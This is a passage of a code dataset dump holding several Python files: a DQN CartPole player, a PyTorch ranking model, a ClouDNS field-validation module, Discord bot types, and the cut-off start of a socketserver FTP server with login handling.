number of characters in the first string is equal to the total number of characters in the second string.\n\ndef chk(a,b):\n attempt = False\n if len(a) == len(b):\n attempt = True\n return attempt\n\na = input(\"Enter input 1: \")\nb = input(\"Enter input 2: \")\nprint(chk(a,b))","sub_path":"strlen.py","file_name":"strlen.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"647951611","text":"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport gym\nimport itertools\nimport matplotlib.pyplot as plt\nfrom IPython import display\nimport time\n\n\n# Creation of the environment\nenv = gym.make(\"CartPole-v1\")\nn_actions = env.action_space.n\nn_state_variables = len(env.observation_space.sample())\n\n################################################################################################################################\n# Define the architecture of the Neural Network\nclass QNet(nn.Module): \n \n def __init__(self):\n super(QNet, self).__init__()\n self.fc1 = nn.Linear(n_state_variables, 256)\n self.fc2 = nn.Linear(256, n_actions)\n \n def forward(self, input):\n x = self.fc1(input)\n x = F.relu(x)\n x = self.fc2(x)\n return x\n\n################################################################################################################################\n# Instantiate the network and load the pretrained weights\nnn = QNet()\nPATH = \"./dqn_weights.pytorch\"\nnn.load_state_dict(torch.load(PATH))\n\nimport matplotlib.pyplot as plt\nfrom IPython import display\nimport time\nimport itertools\n\nstate = env.reset()\nimg = plt.imshow(env.render(mode='rgb_array')) # only call this once\nfor timestep in itertools.count():\n img.set_data(env.render(mode='rgb_array')) # just update the data\n display.display(plt.gcf())\n display.clear_output(wait=True)\n action = torch.argmax(nn.forward(torch.FloatTensor(state))).item()\n # action = env.action_space.sample() # Illustrating how it is to play at randome\n next_state, reward, done, info =env.step(action) \n time.sleep(0.01)\n if done:\n print(\"The duration of the episode/game is : {} timestemps.\".format(timestep+1))\n break\n else:\n state = next_state\nplt.clf()\nplt.close(\"all\")\nenv.close() ","sub_path":"RL/dqn_usage.py","file_name":"dqn_usage.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"78095165","text":"# coding=utf-8\nfrom __future__ import absolute_import\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.nn.init as init\nfrom torch.autograd import Variable\nimport numpy as np\nimport sys\nimport numpy as np\n#import matplotlib.pyplot as plt\n#plt.switch_backend('agg')\nimport os\nimport sys\nimport json\nimport re\nimport shutil\nimport json\nimport datetime\n#from PIL import Image\n#from PIL import ImageFont, ImageDraw\nsys.path.append(\"..\")\nimport utils.data_provider as data_provider\nfrom utils.data_provider import VQADataProvider\nimport config\n\nopt = config.parse_opt()\nclass RankingLoss(nn.Module):\n def __init__(self, vec_size=opt.BATCH_SIZE, margin=0.75):\n super(RankingLoss, self).__init__()\n self.vec_size = vec_size\n self.margin = margin\n return \n \n # def forward(self, mix, rela_right1, rela_false1, rela_right2, rela_false2, rela_right3, rela_false3, margin=0.75):\n def forward(self, mix, rela_right1, rela_false1,margin=0.75): \n # right_item = F.cosine_similarity(mix, rela_right)\n # false_item = F.cosine_similarity(mix, rela_false)\n #self.vec_size = rela_right.shape[0]\n zero1 = torch.zeros(self.vec_size)\n zero1 = Variable(zero1.cuda())\n margin_vec1 = torch.cuda.FloatTensor(self.vec_size)\n margin_vec1.fill_(self.margin)\n margin_vec1 = Variable(margin_vec1)\n #print (right_item.shape)\n margin_vec1 = margin_vec1.sub_(rela_right1)\n loss = torch.max(zero1, margin_vec1.add_(rela_false1))\n '''\n zero2 = torch.zeros(self.vec_size)\n zero2 = Variable(zero2.cuda())\n margin_vec2 = torch.cuda.FloatTensor(self.vec_size)\n margin_vec2.fill_(self.margin)\n margin_vec2 = Variable(margin_vec2)\n #print (right_item.shape)\n margin_vec2 = margin_vec2.sub_(rela_right2)\n loss2 = torch.max(zero2, margin_vec2.add_(rela_false2))\n\n zero3 = torch.zeros(self.vec_size)\n zero3 = Variable(zero3.cuda())\n margin_vec3 = torch.cuda.FloatTensor(self.vec_size)\n margin_vec3.fill_(self.margin)\n margin_vec3 = Variable(margin_vec3)\n #print (right_item.shape)\n margin_vec3 = margin_vec3.sub_(rela_right3)\n loss3 = torch.max(zero3, margin_vec3.add_(rela_false3))\n #print (loss.shape)\n loss = torch.add(loss1, loss2)\n loss = torch.add(loss, loss3)\n loss = torch.div(loss, 3)\n '''\n loss = torch.mean(loss)\n return loss\n\nclass mfh_baseline(nn.Module):\n def __init__(self, opt):\n super(mfh_baseline, self).__init__()\n self.opt = opt\n self.JOINT_EMB_SIZE = 2*opt.LSTM_UNIT_NUM\n # self.Embedding1 = nn.Embedding(opt.quest_vob_size, 300)\n # self.Embedding2 = nn.Embedding(opt.rela_vob_size, 300)\n self.LSTM1 = nn.LSTM(input_size=300, hidden_size=opt.LSTM_UNIT_NUM, num_layers=1, batch_first=False, bidirectional=True)\n self.LSTM2 = nn.LSTM(input_size=300, hidden_size=opt.LSTM_UNIT_NUM, num_layers=1, batch_first=False, bidirectional=True)\n self.LSTM3 = nn.LSTM(input_size=300, hidden_size=opt.LSTM_UNIT_NUM, num_layers=1, batch_first=False, bidirectional=True)\n self.LSTM4 = nn.LSTM(input_size=300, hidden_size=opt.LSTM_UNIT_NUM, num_layers=1, batch_first=False, bidirectional=True)\n self.linear = nn.Linear(1, 1, bias=True)\n \n \n def forward(self, data, data_glove, rb_vec, rb_glove, wrb_vec, wrb_glove, rc_vec, rc_glove, wrc_vec, wrc_glove, mode):\n ## def forward(self, data, data_glove, s_vec, s_glove, mode):\n if mode == 'val' or mode == 'test' :\n self.batch_size = self.opt.VAL_BATCH_SIZE\n else:\n self.batch_size = self.opt.BATCH_SIZE\n # data = torch.transpose(data, 1, 0).long()\n #print (data.shape) # 33*1\n \n data_glove = data_glove.permute(1, 0, 2)\n #print (data_glove.shape) # 33*1*300\n # data = F.tanh(self.Embedding1(data))\n #print (data.shape) # 33*1*300\n # data = torch.cat((data, data_glove) , 2) # 33 * batch * 600\n #print (data.shape) #33*1*600\n data_1_lstm, _ = self.LSTM1(data_glove)\n #H_q = self.relu(data_1_lstm)\n ## H_q = H_q.permute(1,0,2) # batch * seq_len * 1024\n qb_feat, _= torch.max(data_1_lstm, 0)\n data_2_lstm, _ = self.LSTM2(data_glove)\n qc_feat, _= torch.max(data_2_lstm, 0)\n\n\n # rb = rb_vec\n bglove = rb_glove\n bglove = bglove.permute(1, 0, 2)\n # rb = torch.transpose(rb, 1, 0).long()\n # rb = F.tanh(self.Embedding2(rb))\n # rb = torch.cat((rb, bglove), 2) # 17*batch*600\n rb_feat, _ = self.LSTM3(bglove)\n rb_feat, _ = torch.max(rb_feat, 0)\n\n # rc = rc_vec\n cglove = rc_glove\n cglove = cglove.permute(1, 0, 2)\n # rc = torch.transpose(rc, 1, 0).long()\n # rc = F.tanh(self.Embedding2(rc))\n # rc = torch.cat((rc, cglove), 2) # 17*batch*600\n rc_feat, _ = self.LSTM4(cglove)\n rc_feat, _ = torch.max(rc_feat, 0)\n\n ab = self.linear(qb_feat.mul(rb_feat).sum(1).unsqueeze(1))\n ac = self.linear(qc_feat.mul(rc_feat).sum(1).unsqueeze(1))\n\n rb_feat = ab * rb_feat\n rc_feat = ac * rc_feat\n\n rb_score = F.cosine_similarity(qb_feat, rb_feat)\n rc_score = F.cosine_similarity(qc_feat, rc_feat)\n # print(rb_score.shape)\n \n # t_score = F.cosine_similarity(q_feat, t_feat)\n # r_score = r_score.view(-1, 1)\n # t_score = t_score.view(-1, 1)\n \n final_score = rb_score+rc_score\n # print(final_score.shape)\n # wrb = wrb_vec\n wbglove = wrb_glove\n wbglove = wbglove.permute(1, 0, 2)\n # wrb = torch.transpose(wrb, 1, 0).long()\n # wrb = F.tanh(self.Embedding2(wrb))\n # wrb = torch.cat((wrb, wbglove), 2) # 17*batch*600\n wrb_feat, _ = self.LSTM3(wbglove)\n wrb_feat, _ = torch.max(wrb_feat, 0)\n \n # wrc = wrc_vec\n wcglove = wrc_glove\n wcglove = wcglove.permute(1, 0, 2)\n # wrc = torch.transpose(wrc, 1, 0).long()\n # wrc = F.tanh(self.Embedding2(wrc))\n # wrc = torch.cat((wrc, wcglove), 2) # 17*batch*600\n wrc_feat, _ = self.LSTM4(wcglove)\n wrc_feat, _ = torch.max(wrc_feat, 0)\n \n\n wab = self.linear(qb_feat.mul(wrb_feat).sum(1).unsqueeze(1))\n wac = self.linear(qc_feat.mul(wrc_feat).sum(1).unsqueeze(1))\n\n wrb_feat = wab * wrb_feat\n wrc_feat = wac * wrc_feat\n\n wrb_score = F.cosine_similarity(qb_feat, wrb_feat)\n wrc_score = F.cosine_similarity(qc_feat, wrc_feat)\n \n wfinal_score = wrb_score + wrc_score\n # wfinal_score = torch.sigmoid(wr_score)\n \n return 1, final_score, wfinal_score\n \ndef adjust_learning_rate(optimizer, decay_rate):\n for param_group in optimizer.param_groups:\n param_group['lr'] = param_group['lr'] * decay_rate\n \ndef train(opt, folder):\n train_Data = data_provider.VQADataset(opt.TRAIN_DATA_SPLITS, opt.BATCH_SIZE, folder, opt)\n #train_Data.__getitem__(0)\n #train_Data.__getitem__(1)\n print ('---------------------------train_dataset loads sucessfully !--------------------------------------')\n #train_Loader = torch.utils.data.DataLoader(dataset=train_Data,batch_size=1, shuffle=True, pin_memory=True, num_workers=1)\n #print train_Loader\n model = mfh_baseline(opt)\n model.cuda()\n optimizer = optim.Adam(model.parameters(), lr = opt.INIT_LEARNING_RATE)\n torch.cuda.set_device(opt.TRAIN_GPU_ID)\n criterion = RankingLoss()\n train_loss = np.zeros(opt.MAX_ITERATIONS + 1)\n results = []\n\n for iter_idx, (data, glove_data, rb, rb_glove, rb_false, frb_glove, rc, rc_glove, rc_false, frc_glove, epoch) in enumerate(train_Data):\n model.train()\n # 将以上的 torch类型变量转为np类型,并将维度值为1的维度删去\n # iter_idx += 1\n data = torch.from_numpy(data)\n glove_data = torch.from_numpy(glove_data)\n \n\n # rb = torch.from_numpy(rb)\n rb_glove = torch.from_numpy(rb_glove)\n # rb_false = torch.from_numpy(rb_false) \n \n \n # rc = torch.from_numpy(rc)\n rc_glove = torch.from_numpy(rc_glove)\n # rc_false = torch.from_numpy(rc_false)\n fb1, fb2, fb3 = frb_glove\n fc1, fc2, fc3 = frc_glove\n\n frb_glove1 = torch.from_numpy(fb1)\n frc_glove1 = torch.from_numpy(fc1)\n # frb_glove2 = torch.from_numpy(fb2)\n # frc_glove2 = torch.from_numpy(fc2)\n # frb_glove3 = torch.from_numpy(fb3)\n # frc_glove3 = torch.from_numpy(fc3)\n \n np.int(epoch)\n\n # 将需要传入网络的张量用Variable包装起来,为传入网络计算模块做准备,并使用cuda加速运算\n # data = Variable(data).cuda().long()\n glove_data = Variable(glove_data).cuda().float()\n # glove_data2 = glove_data.clone()\n # glove_data3 = glove_data.clone()\n \n # rb = Variable(rb).cuda().float()\n rb_glove = Variable(rb_glove).cuda().float()\n # rb_false = Variable(rb_false).cuda().float()\n # rb_glove2 = rb_glove.clone()\n # rb_glove3 = rb_glove.clone()\n # rc = Variable(rc).cuda().float()\n rc_glove = Variable(rc_glove).cuda().float()\n # rc_glove2 = rc_glove.clone()\n # rc_glove3 = rc_glove.clone()\n # rc_false = Variable(rc_false).cuda().float()\n frb_glove1 = Variable(frb_glove1).cuda().float()\n frc_glove1 = Variable(frc_glove1).cuda().float()\n ''' \n frb_glove2 = Variable(frb_glove2).cuda().float()\n frc_glove2 = Variable(frc_glove2).cuda().float()\n frb_glove3 = Variable(frb_glove3).cuda().float()\n frc_glove3 = Variable(frc_glove3).cuda().float()\n '''\n # 将优化器初始化,并将数据传入网络计算模块中进行计算,得到预测分类类别的概率向量pred: opt.BATCH_SIZE * 3000维的向量\n # forward pass : compute predicted y by passing x to the model\n optimizer.zero_grad()\n pred, right_score1, wrong_score1 = model(0, glove_data, 0, rb_glove, 0, frb_glove1, 0, rc_glove, 0, frc_glove1, 'train')\n # pred, right_score2, wrong_score2 = model(0, glove_data2, 0, rb_glove2, 0, frb_glove2, 0, rc_glove2, 0, frc_glove2, 'train')\n # pred, right_score3, wrong_score3 = model(0, glove_data3, 0, rb_glove3, 0, frb_glove3, 0, rc_glove3, 0, frc_glove3, 'train')\n \n # right = torch.mean(right_score3)\n # right.backward()\n # print (right_score)\n # print right_score.shape, wrong_score.shape\n # rela_right = model.get_LSTM_vec(relation, r_glove)\n # rela_false = model.get_LSTM_vec(relation_false, fr_glove)\n # compute loss 计算损失\n loss = criterion(pred, right_score1, wrong_score1)\n \n\n # perform a backward pass and update the weights 反向传播并更新权重\n loss.backward()\n optimizer.step()\n\n # 以下都是输出和保存迭代中的信息\n train_loss[iter_idx] = loss.data.item()\n\n if iter_idx % opt.DECAY_STEPS== 0 and iter_idx != 0:\n adjust_learning_rate(optimizer, opt.DECAY_RATE)\n if iter_idx % opt.PRINT_INTERVAL == 0 and iter_idx != 0:\n now = str(datetime.datetime.now())\n c_mean_loss = train_loss[iter_idx - opt.PRINT_INTERVAL:iter_idx].mean()/opt.BATCH_SIZE\n # writer.add_scalar('mfh_baseline_glove/train_loss', c_mean_loss, iter_idx)\n # writer.add_scalar('mfh_baseline_glove/lr', optimizer.param_groups[0]['lr'], iter_idx)\n print('{}\\tTrain Epoch : {}\\tIter: {}\\tLoss: {:.12f}'.format(now, epoch, iter_idx, c_mean_loss))\n if iter_idx % opt.CHECKPOINT_INTERVAL == 0 and iter_idx != 0:\n if not os.path.exists('./{}'.format(opt.pth_path)):\n os.makedirs('./{}'.format(opt.pth_path))\n save_path = './{}/mfh_baseline_glove_iter'.format(opt.pth_path) + str(iter_idx) + '.pth'\n torch.save(model.state_dict(), save_path)\n \n \n \n\n","sub_path":"mfh_baseline.py","file_name":"mfh_baseline.py","file_ext":"py","file_size_in_byte":12262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"357532009","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# name: validation.py\n# author: Harold Bradley III\n# email: harold@bradleystudio.net\n# created on: 09/16/2018\n#\n\n\"\"\"\nclouddns.validation\n~~~~~~~~~~~~~~~~~~~\n\nThis module contains functions to validate fields passed into the API.\n\"\"\"\n\nimport re\n\n\nclass ValidationError(Exception):\n \"\"\"Exception thrown when a validation error has occured.\"\"\"\n def __init__(self, fieldname, message, *args, **kwargs):\n \"\"\"Initialize ValidationError with `fieldname` and `message` values.\"\"\"\n self.details = {\n 'fieldname': fieldname,\n 'message': message,\n }\n super(ValidationError, self).__init__(message, *args, **kwargs)\n\n def get_details(self):\n \"\"\"Returns a list of error details.\"\"\"\n return [self.details]\n\n\nclass ValidationErrorsBatch(ValidationError):\n \"\"\"Exception thrown when multiple validation errors have occured.\"\"\"\n def __init__(self, validation_errors, *args, **kwargs):\n \"\"\"Initialize ValidationError with `validation_errors` list.\"\"\"\n self.validation_errors = validation_errors\n super(ValidationError, self).__init__('Validation errors occured.', *args, **kwargs)\n\n def get_details(self):\n \"\"\"Returns a list of error details.\"\"\"\n return [error.details for error in self.validation_errors]\n\n\n# Global value: Only use this in check_for_validation_errors and validate.\n_batched_validation_errors = []\n\n\ndef check_for_validation_errors():\n \"\"\"Checks for batched validation errors and raises a ValidationErrorsBatch\n if any are found. Otherwise, does nothing.\"\"\"\n global _batched_validation_errors\n if len(_batched_validation_errors) > 0:\n raise ValidationErrorsBatch(_batched_validation_errors)\n\n\ndef validate(value, fieldname, *args, **kwargs):\n \"\"\"Validates a value for a particular fieldtype.\n Returns a value if it is valid; raises an error otherwise.\n\n :param value: mixed, the value to validate\n :param fieldname: string, the fieldname to validate (determines the type of\n validation to use)\n :param optional: bool, (kwarg) if True, accept None as a valid value\n :param batch: bool, (kwarg) if True, batches errors for later processing\n \"\"\"\n try:\n if kwargs.get('optional', False) and not value:\n return value\n elif not value:\n raise ValidationError(fieldname, 'This field is required.')\n\n if fieldname not in validation_functions:\n return value\n\n if validation_functions[fieldname](value, fieldname, *args, **kwargs):\n return value\n\n # If for some reason the validation fails, but no error was raised,\n # raise one here. This should hopefully never happen\n raise ValidationException('Unexpected validation error.')\n\n except ValidationError as e:\n if kwargs.get('batch', False):\n global _batched_validation_errors\n _batched_validation_errors.append(e)\n else:\n raise e\n\n\ndef batch_validate(value, fieldname, *args, **kwargs):\n \"\"\"Helpful wrapper around validate with batch flag set to True.\"\"\"\n return validate(value, fieldname, *args, batch = True, **kwargs)\n\n\ndef is_int(value, fieldname, min_value = None, max_value = None, **kwargs):\n \"\"\"Returns the value if value is an integer (within min_value/max_value\n range); otherwise, raises a validation error.\"\"\"\n try:\n value += 0 # Try it to see if it is an integer\n except TypeError:\n raise ValidationError(fieldname, 'This field must be an integer.')\n\n if min_value and value < min_value:\n raise ValidationError(fieldname,\n 'This field must be greater than ' + str(min_value) + '.')\n if max_value and value > max_value:\n raise ValidationError(fieldname,\n 'This field must be less than ' + str(max_value) + '.')\n return True\n\n\ndef is_domain_name(value, fieldname, **kwargs):\n \"\"\"Returns the value if value is a valid domain name. Otherwise, raises a\n validation error.\"\"\"\n if not re.match('^((?=[a-z0-9-]{1,63}\\.)(xn--)?[a-z0-9]+(-[a-z0-9]+)*\\.)+[a-z]{2,63}$',\n value):\n raise ValidationError(fieldname,\n 'This field must be a valid domain name.')\n return True\n\n\ndef is_email(value, fieldname, **kwargs):\n \"\"\"Returns the value if value is a valid domain name. Otherwise, raises a\n validation error.\"\"\"\n if not re.match('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)',\n value):\n raise ValidationError(fieldname,\n 'This field must be a valid email.')\n return True\n\n\ndef is_record_type(value, fieldname, **kwargs):\n \"\"\"Returns the value if value is a valid domain recordy type. Otherwise,\n raises a validation error.\"\"\"\n try:\n if value.upper() not in RECORD_TYPES:\n raise ValidationError(fieldname,\n 'This field must be a valid domain record type.')\n # If value isn't a string, upper() raises AttributeError\n except AttributeError:\n raise ValidationError(fieldname,\n 'This field must be a valid domain record type.')\n return True\n\nRECORD_TYPES = ['A', 'AAAA', 'MX', 'CNAME', 'TXT', 'NS', 'SRV', 'WR',\n 'RP', 'SSHFP', 'ALIAS', 'CAA', 'PTR' ]\n\n\ndef is_ttl(value, fieldname, **kwargs):\n \"\"\"Returns the value if value is a valid ClouDNS ttl. Otherwise, raises a\n validation error.\"\"\"\n try:\n if value.lower() not in TTL_STRINGS:\n raise ValidationError(fieldname,\n 'This field must be a valid ttl. ' + \\\n '(1 minute, 5 minutes, 15 minutes, ' + \\\n '30 minutes, 1 hour, 6 hours, 12 hours, ' + \\\n '1 day, 2 days, 3 days, 1 week, 2 weeks, ' + \\\n 'or 1 month)')\n # If value isn't a string, lower() raises AttributeError\n except AttributeError:\n if value not in TTLS:\n raise ValidationError(fieldname,\n 'This field must be a valid ttl. ' + \\\n '(60, 300, 900, 1800, 3600, 21600, ' + \\\n '43200, 86400, 172800, 259200, 604800, ' + \\\n '1209600, or 2592000)')\n return True\n\nTTL_STRINGS = ['1 minute', '5 minutes', '15 minutes', '30 minutes', '1 hour',\n '6 hours', '12 hours', '1 day', '2 days', '3 days', '1 week',\n '2 weeks', '1 month']\n\nTTLS = [60, 300, 900, 1800, 3600, 21600, 43200, 86400, 172800, 259200, 604800,\n 1209600, 2592000]\n\n\ndef is_redirect_type(value, fieldname, **kwargs):\n \"\"\"Returns the value if it is 301 or 302. Otherwise, raises a validation\n error.\"\"\"\n if value != 301 and value != 302:\n raise ValidationError(fieldname,\n 'This field must be 301 (permanent) or 302 (temporary).')\n return True\n\n\ndef is_algorithm(value, fieldname, **kwargs):\n \"\"\"Returns the value if it is a proper algorithm. Otherwise, raises a\n validation error.\"\"\"\n try:\n if value.upper() not in ALGORITHMS:\n raise ValidationError(fieldname,\n 'This field must be RSA, DSA, ECDSA, or Ed25519.')\n # If value isn't a string, upper() raises AttributeError\n except AttributeError:\n if value not in [1, 2, 3, 4]:\n raise ValidationError(fieldname,\n 'This field must be RSA, DSA, ECDSA, or Ed25519.')\n return True\n\nALGORITHMS = ['RSA', 'DSA', 'ECDSA', 'ED25519']\n\n\ndef is_fptype(value, fieldname, **kwargs):\n \"\"\"Returns the value if it is a proper fingerprint type. Otherwise, raises\n a validation error.\"\"\"\n try:\n if value.upper() not in FP_TYPES:\n raise ValidationError(fieldname,\n 'This field must be one of SHA-1 or SHA-256.')\n # If value isn't a string, upper() raises AttributeError\n except AttributeError:\n if value not in [1, 2]:\n raise ValidationError(fieldname,\n 'This field must be one of SHA-1 or SHA-256.')\n return True\n\nFP_TYPES = ['SHA-1', 'SHA-256']\n\n\ndef is_caa_flag(value, fieldname, **kwargs):\n \"\"\"Returns the value if it is 0 or 128. Otherwise, raises a validation\n error.\"\"\"\n if value != 0 and value != 128:\n raise ValidationError(fieldname,\n 'This field must be 0 (non-critical) or 128 (critical).')\n return True\n\n\ndef is_caa_type(value, fieldname, **kwargs):\n \"\"\"Returns the value if value is a caa type. Otherwise, raises a validation\n error.\"\"\"\n try:\n if value.lower() not in CAA_TYPES:\n raise ValidationError(fieldname,\n 'This field must be one of issue, issuewild, iodef.')\n # If value isn't a string, lower() raises AttributeError\n except AttributeError:\n raise ValidationError(fieldname,\n 'This field must be one of issue, issuewild, iodef.')\n return True\n\nCAA_TYPES = ['issue', 'issuewild', 'iodef']\n\n\ndef is_required(value, fieldname, **kwargs):\n \"\"\"Returns the value if there is some value provided. Otherwise, raises a\n validation error.\"\"\"\n if not value:\n raise ValidationError(fieldname,\n 'This field is required.')\n return True\n\n\ndef is_api_bool(value, fieldname, **kwargs):\n \"\"\"Returns the value if value is a 0 or 1. Otherwise, raises a validation\n error.\"\"\"\n if value != 0 and value != 1:\n raise ValidationError(fieldname,\n 'This field must be 0 or 1.')\n return True\n\n\ndef is_valid(value, fieldname, **kwargs):\n \"\"\"Returns the value assuming it's valid.\"\"\"\n return True\n\n\n# Set up validation functions dict\nvalidation_functions = {\n 'admin-mail': is_email,\n 'algorithm': is_algorithm,\n 'bool': is_api_bool,\n 'caa_flag': is_caa_flag,\n 'caa_type': is_caa_type,\n 'caa_value': is_valid,\n 'default-ttl': is_int,\n 'domain-name': is_domain_name,\n 'email': is_email,\n 'fptype': is_fptype,\n 'frame': is_api_bool,\n 'frame-title': is_valid,\n 'geodns-location': is_int,\n 'integer': is_int,\n 'mail': is_email,\n 'port': is_int,\n 'primary-ns': is_domain_name,\n 'priority': is_int,\n 'record': is_required,\n 'redirect-type': is_redirect_type,\n 'refresh': is_int,\n 'required': is_required,\n 'save-path': is_api_bool,\n 'status': is_api_bool,\n 'ttl': is_ttl,\n 'txt': is_domain_name,\n 'type': is_record_type,\n 'weight': is_int,\n}\n","sub_path":"cloudns_api/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":11043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"382392330","text":"#!/usr/bin/env python3\n\nimport enum\nfrom typing import Generic, Optional, TypeVar\n\n\nT = TypeVar(\"T\")\n\n\nclass GreedyStr(str):\n \"\"\"\n Special type designation for a string which should consume the rest\n of the arguments when parsing a command. Uses type hinting for some\n weird reflection stuff that kind of feels hacky and sketchy.\n \"\"\"\n\n\nclass BotParam(Generic[T]):\n \"\"\"\n Special type designation for a type which should be kept *secret* from\n usage helptext. This is useful for bot-only arguments such as changing\n the actor to be the bot itself instead of the original message sender.\n \"\"\"\n\n\nclass Status(enum.Enum):\n Success = 1\n Failure = 2\n Invalid = 3\n\n\nclass HandlerStatus:\n def __init__(self, status: Status, msg: Optional[str] = None) -> None:\n self.status = status\n self.msg = msg or \"\"\n\n\nclass SetMessageSubcommand(enum.Enum):\n WIN = 1\n LOSE = 2\n\n @classmethod\n def from_str(cls, s: str) -> \"SetMessageSubcommand\":\n if s.strip().lower() == \"win\":\n return SetMessageSubcommand.WIN\n elif s.strip().lower() == \"lose\":\n return SetMessageSubcommand.LOSE\n else:\n raise ValueError(f\"Could not parse {s} as SetMessageSubcommand\")\n\n\nclass Rename(enum.Enum):\n SERVER = 1\n TEXT_CHAT = 2\n\n\nclass Time:\n def __init__(self, s: str) -> None:\n self.s = s\n\n def __str__(self) -> str:\n return f\"{self.s} ({self.seconds} seconds)\"\n\n def __repr__(self) -> str:\n return str(self)\n\n @property\n def seconds(self) -> int:\n units = {}\n units[\"s\"] = 1\n units[\"m\"] = units[\"s\"] * 60\n units[\"h\"] = units[\"m\"] * 60\n units[\"d\"] = units[\"h\"] * 24\n units[\"y\"] = units[\"d\"] * 365\n\n seconds = 0\n idx = 0\n while idx < len(self.s):\n builder = 0\n # Get value\n while idx < len(self.s) and self.s[idx].isdigit():\n builder = builder * 10 + int(self.s[idx])\n idx += 1\n # Now get unit\n unit_value = units[self.s[idx]]\n # Consume until end of units or string\n while idx < len(self.s) and not self.s[idx].isdigit():\n idx += 1\n # Add to total\n seconds += builder * unit_value\n return seconds\n\n\nclass DiscordUser:\n def __init__(self, discord_id: int) -> None:\n self.id = discord_id\n\n def __str__(self) -> str:\n return str(self.id)\n\n def __repr__(self) -> str:\n return str(self)\n\n @classmethod\n def from_str(cls, s: str) -> \"DiscordUser\":\n if len(s) > 0 and s[0] == \"<\" and s[-1] == \">\":\n s = s[1:-1]\n if len(s) > 0 and s[0:2] == \"@!\":\n s = s[2:]\n elif len(s) > 0 and s[0] == \"@\":\n # Sometimes there's a leading @ but no ! -- I don't know why\n s = s[1:]\n return DiscordUser(int(s))\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"517407963","text":"import os\nimport sys\nimport json\nimport time\nimport timer\nimport shutil\nimport hashlib\nimport logging\nimport socketserver\n\nbase_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(base_dir)\n\nfrom core.record import record\nfrom data.conf.configure import HomeDocs, username, password\nfrom data.dict.dict import Stand_msg\n\n'''\n# 拼接文件日志,格式为 %Y-%m-%d.txt\n'''\ntimer = time.strftime(\"%Y-%m-%d\")\nlogger = record(base_dir + \"\\\\data\\\\log\\\\\" + timer + \".txt\")\n\nclass MyTCPHandler(socketserver.BaseRequestHandler):\n '''\n # 解析连接请求参数\n '''\n def setup(self):\n auth_msg_source = self.request.recv(1024).strip()\n self.auth_msg = json.loads(auth_msg_source)\n if(self.auth_msg.get('type')) == 'auth':\n self.username = self.auth_msg['username']\n self.md5_password = self.auth_msg['password']\n self.ipaddr = self.auth_msg['ipaddr']\n self.role = self.auth_msg['auth_tag']\n logger.info(\"用户名: %s尝试从终端 %s 登录服务器\"%(self.username, self.ipaddr))\n\n '''\n # 处理连接\n '''\n def handle(self):\n if self.auth_msg.get('type') == 'auth':\n auth_tag = self.__auth()\n if auth_tag==101:\n logger.info(\"用户 %s 从终端 %s 登录成功!\"%(self.username,self.ipaddr))\n #此处定义的是当前登录用户的目标文件夹,此处也是函数self.dest初始化的位置\n self.dest=HomeDocs+\"\\\\\"+self.username\n ##########此处执行的动作是创建以用户名命名的文件夹,防止后续操作出现问题###############\n dirs=self.dest.split(\"\\\\\")\n res_item=\"\"\n for item in dirs:\n res_item=res_item+item+\"\\\\\"\n if os.path.exists(res_item):\n pass\n else:\n os.mkdir(res_item)\n ###################读取当前用户的空间使用值#############################################\n with open(base_dir+\"\\\\data\\\\users\\\\Quota.txt\",\"r\") as f_qtread:\n for qt in f_qtread:\n qtusr,qtvl=qt.strip(\"\\n\").strip('\"').split(\":\")\n if qtusr==self.username:\n self.qtvl=qtvl\n self.qtvl=int(self.qtvl)*1024*1024\n break\n ####################读取当前用户名下的文件大小###########################################\n self.allsize=0\n for size_path,size_dirs,size_files in os.walk(HomeDocs+\"\\\\\"+self.username):\n for item in size_files:\n self.allsize=self.allsize+int(os.path.getsize(os.path.join(size_path,item)))\n self.__changemsg()\n elif auth_tag==102:\n logger.error(\"用户名 %s 未注册。\"%self.username)\n elif auth_tag==100:\n logger.error(\"用户登录失败,用户名或密码发送错误。\")\n\n '''\n # 服务端用户加密认证\n '''\n def __auth(self):\n if self.role == 'ordinary': # 普通用户身份登录\n auth_tag=False\n if os.path.exists(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\"):\n with open(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\",\"r\") as f_read:\n for line in f_read:\n usr,pad=line.strip('\\n').strip('\"').split(\":\")\n if usr==self.username and pad ==self.md5_password:\n auth_tag=True\n self.__sendmsg(101)\n return 101\n if auth_tag==False:\n self.__sendmsg(100)\n return 100\n else:\n self.__sendmsg(102)\n return 102\n elif self.role == 'mgr': # 管理员身份登录\n m = hashlib.md5(password.encode('utf-8'))\n passwd_value = m.hexdigest()\n if self.username == username and self.md5_password == passwd_value:\n self.__sendmsg(101, data = 'True')\n logger.info(\"用户 %s 从终端 %s 登录成功!\" % (self.username, self.ipaddr))\n try:\n self.__mgr()\n except:\n logger.info(\"%s的管理员已断开连接。\" % self.ipaddr)\n else:\n self.__sendmsg(100)\n\n '''\n # 发送处理结果给请求端\n '''\n def __sendmsg(self, stand_code, data=None):\n sendmsg = {\n 'standcode':stand_code,\n 'standmsg':Stand_msg[stand_code],\n 'data':data\n }\n self.request.send(json.dumps(sendmsg).encode())\n\n '''\n # 此为管理员相关功能的函数,不涉及FTP自身的功能\n '''\n def __mgr(self):\n '''\n 此为管理员相关功能的函数,不涉及FTP自身的功能\n :return:\n '''\n while True:\n msg='''\n 1.注册用户\n 2.删除用户\n 3.查看用户\n 4.修改配额\n 5.退出\n '''\n self.__sendmsg(102,data=msg)\n ret_msg=self.__recvmsg()\n if 